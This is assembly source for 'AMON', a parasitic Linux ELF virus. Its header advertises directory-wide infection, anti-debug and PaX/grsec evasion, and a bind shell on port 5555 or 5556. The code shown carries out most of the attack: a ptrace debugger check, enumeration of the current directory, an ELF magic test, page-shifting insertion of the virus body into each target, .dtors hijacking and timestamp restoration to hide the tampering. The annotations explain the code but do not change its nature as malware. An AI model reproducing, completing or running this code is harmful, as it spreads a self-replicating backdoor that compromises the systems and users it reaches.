
;------------------------------------------------------------------------------
;
;                       AMON by emp && rikenar
;                       ----------------------
;
;
;
;
;
; AMON : parasitic ELF virus
;
;
;
;
;                      Description :
;                      -------------
;
; - Infect all ELF in the current directory.
; - Fully compatible with all kernels 2.2.x, 2.4.x and probably with all 2.6.x.
; - Fully compatible with all options of the kernel security patches (PaX/grsec ...).
; - Use basic EPO technique.
; - Use basic anti debug trick.
; - Bind a shell on port 5556 if UID = 0 else bind a shell on port 5555.
; - Only 960 bytes with complete strip.
; - Restore date and time of last modification.
;
;
;
; Tested on - redhat 9.0 (kernel 2.4.20 && 2.4.21+grsec/PaX)
;           - debian 3.0 (kernel 2.2.20 && 2.2.25+PaX)
;           - KNOPPIX 3.2 (kernel 2.4.21)
;
;
;
;
;
;
;anonymous@neptune ~/code/amon $ cat Makefile
;all:
;        @echo "-+ amon by rikenar and emp +-"
;        nasm -f elf amon.asm
;        cc amon.o -o amon -nostdlib
;        rm -f amon.o
;
;strip:
;        strip amon
;        sstrip amon
;
;
;anonymous@neptune ~/code/amon $ make
;-+ amon by rikenar and emp +-
;nasm -f elf amon.asm
;cc amon.o -o amon -nostdlib
;rm -f amon.o
;
;
;anonymous@neptune ~/code/amon $ make strip
;strip amon
;sstrip amon
;
;
;anonymous@neptune ~/code/amon $ ls -l amon
;-rwx------    1 anonymous  anonymous       960 nov  7 01:48 amon
;
;
;
;
;
;greetz : people on #ioc and all our friends
;
;------------------------------------------------------------------------------

; i386 Linux system-call numbers for the int 0x80 ABI (eax = number, arguments
; in ebx, ecx, edx, esi, edi; result or -errno in eax). Two more numbers are
; used below as bare immediates rather than through this table: exit (1) in
; byebye and utime (30) in the infection loop.
%define         sys_fork        2
%define         sys_read        3
%define         sys_open        5
%define         sys_close       6
%define         sys_exec        11
%define         sys_getpid      20
%define         sys_getuid      24
%define         sys_ptrace      26
%define         sys_kill        37
%define         sys_dup2        63
%define         sys_mmap        90
%define         sys_munmap      91
%define         sys_ftruncate   93
%define         sys_socket      102
%define         sys_fstat       108
%define         sys_getdents    141

; PT_LOAD : ELF program-header type of a loadable segment.
; O_RDWR  : open(2) flag used by openfile below.
; LISTEN  : presumably the listen(2) backlog of the payload described in the
;           header; not referenced in this part of the file.
; SIGKILL : signal number 9; not referenced in this part of the file.
; ELFMAG  : the four bytes "\x7fELF" read as one little-endian dword; verif
;           compares the first dword of a candidate file against it.
%define         PT_LOAD         01
%define         O_RDWR          2
%define         LISTEN          4
%define         SIGKILL         9
%define         ELFMAG          0x464C457F

global _start

section .evil

;-----------------------------------------------------------------------------
; _start -- entry point of the virus body (32-bit Linux, int 0x80 syscalls,
; NASM syntax). Control flow, top to bottom:
;   ptrace self-check -> call bomb (payload, not in this chunk) -> open "."
;   -> getdents -> for each directory entry: open, verif, fstat, infection,
;   utime (restore timestamps), close -> nextfile (not in this chunk) -> exit(0)
; Register roles inside the loop: esp walks the getdents buffer left on the
; stack by getdents; esi and ebx alternately hold the entry-name pointer and
; the open fd, swapped with xchg.
;-----------------------------------------------------------------------------
_start:

;ptrace(PTRACE_TRACEME, 0, 0x1, 0)
;
; ebx = 0 (PTRACE_TRACEME), ecx = 0 (pid), edx = 1 (addr), esi = 0 (data)
;anti debug trick: PTRACE_TRACEME returns non-zero when the process already
;has a tracer attached (debugger, strace), in which case the code exits at
;once without touching any file.

        xor     eax, eax
        cdq                             ; edx = 0 (sign of eax)
        inc     edx                     ; edx = 1 (addr argument)
        xor     ecx, ecx                ; pid = 0
        xor     ebx, ebx                ;PTRACE_TRACEME
        xor     esi, esi                ; data = 0
        mov      al, sys_ptrace
        int     0x80
        test    eax, eax                ; 0 on success
        jne     NEAR byebye             ;if code is traced then exit

        call    bomb                    ; payload; bomb is not defined in this chunk

;----------------------------------------------------------------------------
;
; find file to infect and call the infection function

        push '.'                        ; "." as a NUL-terminated string on the stack
        mov  ebx, esp                   ; ebx -> "."
        call  opendir                   ;open current directory (fd returned in eax)

        call  getdents                  ;list file of this directory; on return esp
                                        ;points at the first linux_dirent (see getdents)

        add  esp, 0x08                  ;next name: skip d_ino and d_off, esp now at
                                        ;the 2-byte d_reclen, d_name follows it

again:
        mov  ebx, esp
        add  ebx, 2                     ; skip d_reclen
        mov esi, ebx                    ; esi = ebx = d_name of the current entry

        call openfile                   ; open file (O_RDWR); eax = fd or -errno


        cmp   ah, 0xFF                  ; if error on open (negative errno in eax)
        je    nextf                     ; find another file


        call verif                      ; test file type and infection; the caller
                                        ; relies on ebx = fd afterwards
        test eax, eax                   ; eax == 0: not an ELF (or rejected by verif)
        je   nextf                      ; find another file

        mov  eax, sys_fstat
        sub  esp, 0x40                  ; 64-byte struct stat buffer on the stack
        mov  ecx, esp
        int  0x80                       ; file size (fstat(fd, buf))
        add  esp, 0x40                  ; buffer released but still addressed via ecx
                                        ; (the pushes below read it from under esp)

        push DWORD [ecx+0x28]           ; st_mtime
        push DWORD [ecx+0x20]           ; st_atime -> {atime, mtime} = utimbuf on stack
        push esi                        ; save name of file for utime.

        mov  ecx, [ecx+0x14]            ; ecx = st_size
        mov  esi, ecx                   ; esi = st_size too (infection reads both)

        call infection                  ; WAR IS ON !  (in: ebx = fd, ecx = esi = st_size)

        xchg ebx, esi                   ; fd in esi.

        mov eax, 0x1e                   ; sys_utime (30), not in the %define table
        pop ebx                         ; ebx = file name
        mov ecx, esp                    ; ecx -> the utimbuf pushed above
        int 0x80                        ; utime(name, {atime, mtime}): puts the original
                                        ; timestamps back after the write
        add esp, 8                      ; drop the utimbuf

nextf:
        xchg esi, ebx                   ; fd in ebx.
        mov eax, sys_close
        int 0x80

        call nextfile                   ; find next file (not defined in this chunk)
        test eax, eax                   ; eax != 0: another entry to process
        jne  again

exit:

byebye:
        xor eax, eax
        inc eax                         ; bye bye: eax = 1 = sys_exit
        xor ebx, ebx                    ; exit status 0
        int 0x80

;---------------------------------------------------------------------------
;
; infection functions
;
; infection -- insert the virus body into an open ELF file.
; In  : ebx = fd of the target, ecx = esi = st_size (from the caller's fstat)
; Out : ebx = fd (restored); the file has been grown, mapped, rewritten and
;       unmapped. Everything else is clobbered.
; Helpers not present in this chunk: Mapping, PatchSegment, PatchSection,
; hijackDtors, Demap; the symbol fin_code (end of the body) is also elsewhere.
; Method: the file tail starting at the second program header's p_offset is
; copied to a temporary stack buffer and written back 0x1000 bytes higher,
; opening a one-page hole; the virus body is copied into that hole; e_shoff
; is bumped by a page and the Patch* / hijackDtors helpers adjust the rest.

infection:

        add  ecx, 0x2000
        and  ecx, 0xFFFFF000            ; ecx = (st_size + 0x2000) & ~0xFFF : old size
                                        ; rounded up to a page plus one extra page
        mov  eax, sys_ftruncate         ; size of file multiple of 0x1000
        int  0x80                       ; ftruncate(fd, ecx) grows the file

        push ebx                        ; save fd
        push ecx                        ; push size of file for unmap
        call Mapping                    ; map file, adress of map in eax.



        xchg esi, ecx                   ; ecx = original st_size, esi = grown size
        mov  ebx, [eax+0x1c]            ; ebx = e_phoff
        add  bx, WORD [eax+0x2a]        ; phdr INTERP. (+ e_phentsize -> 2nd phdr;
                                        ; 16-bit add, a carry out of bx is lost)
        mov  esi, [eax+ebx+0x04]        ; offset of this phdr. (its p_offset)
        push esi                        ; keep p_offset for the PatchSection call
        sub  ecx, esi                   ; size of code to move. (st_size - p_offset)
        sub  esp, ecx                   ; temporary stack buffer of that size
        add  esi, eax                   ; esi -> map + p_offset
        mov  edx, ecx                   ; edx = tail length (used twice below)
        mov  edi, esp
        rep  movsb                      ; copy tail [p_offset, st_size) to the stack

        mov  esi, esp
        mov  ecx, edx
        mov  ebx, [eax+0x1c]
        add  bx, WORD [eax+0x2a]        ; same program header again
        mov  edi, [eax+ebx+4]
        add  edi, eax
        add  edi, 0x1000                ; destination = map + p_offset + 0x1000
        rep  movsb                      ; write the tail back one page higher
        add  esp, edx                   ; release the temporary buffer

        call PatchSegment               ; Patch segments. (not in this chunk)
        pop  edi                        ; edi = p_offset = start of the new hole
        push eax                        ; save map base
        mov  ecx, edi                   ; ecx = hole offset for PatchSection
        call PatchSection               ; Patch sections. (not in this chunk)
        pop  eax                        ; restore map base
        mov  ecx, 0x1000
        add  [eax+0x20], ecx            ; Patch e_shoff. (section headers moved by a page)

        call delta
delta:  pop ebx                         ; ebx = runtime address of delta
        sub ebx, delta                  ; delta offset. (runtime minus link-time address)

        mov  esi, _start
        add esi, ebx                    ; esi = runtime address of the virus body
        add  ebp, edi                   ; ebp = adress of code (ebp's prior value is not
                                        ; established anywhere in this chunk)
        add  edi, eax                   ; edi = map + p_offset (the hole)
        mov  ecx, fin_code - _start     ; body length; fin_code is defined elsewhere
        rep  movsb                      ; write code.

        mov  ebx, eax                   ; ebx = map base for hijackDtors
        call hijackDtors                ; hijack .dtors. (not in this chunk)

        pop  ecx                        ; restaure the size
        call Demap                      ; presumably munmap; not in this chunk
        pop  ebx                        ; restaure fd
        ret

;----------------------------------------------------------------------------
;
; opendir -- open(name, O_RDONLY, 0) via int 0x80
;in  : name directory in ebx
;out : fd in eax (or -errno on failure; the caller passes eax straight to
;      getdents without checking it)

opendir:
        xor  eax, eax
        mov   al, sys_open
        xor  ecx, ecx           ;O_RDONLY (flags = 0)
        xor  edx, edx           ;mode = 0
        int  0x80
        ret

;-----------------------------------------------------------------------------
;
; openfile -- open(name, O_RDWR, 0) via int 0x80
;in  : pointer to name of file in ebx
;out : fd in eax, or -errno on failure. (An earlier comment said ebx: the
;      syscall result is in eax; the caller tests ah == 0xFF on it and verif
;      moves it into ebx with xchg.)

openfile:
        xor  eax, eax
        mov   al, sys_open      ;open
        xor  ecx, ecx
        mov   cl, O_RDWR        ;flags = O_RDWR
        xor  edx, edx           ;mode = 0
        int  0x80
        ret

;-----------------------------------------------------------------------------
;
; getdents -- getdents(dirfd, buf, 0x10000) with the buffer carved out of the
; caller's stack.
;in  : directory fd in eax
;out : result of getdents on stack: the return address is popped first, 64 KiB
;      is reserved, and the address is pushed back just below it, so after ret
;      esp points at the first linux_dirent. The buffer is not released in
;      this chunk. eax = getdents return value (unchecked by the caller),
;      ebx = dirfd, ecx = buffer, edx = 0x10000.

getdents:
        pop  esi                ;save ret addr (so the buffer can sit above it)
        sub  esp, 0x10000       ;i want some place on stack (64 KiB dirent buffer)

        xchg eax, ebx           ;ebx = dirfd
        xor  eax, eax
        mov   al, sys_getdents
        mov  ecx, esp           ;buf
        mov  edx, 0x10000       ;count
        int  0x80

        push esi                ;return address back just below the buffer

        ret                     ;after ret, esp == buffer start

;-----------------------------------------------------------------------------
;
;in  : file fd in eax
;out : ebx == NULL if file type false or infection true

verif:
        xchg ebx, eax
        call read

        cmp  eax, ELFMAG                ;if file is not an ELF
        je verifsuite

        xor eax, eax                    ;eax == 0
        ret                             ;

verifsuite:

        ;check infection
        mov  eax, sys_fstat
        sub  esp, 0x40
        mov  ecx, esp
        int  0x80
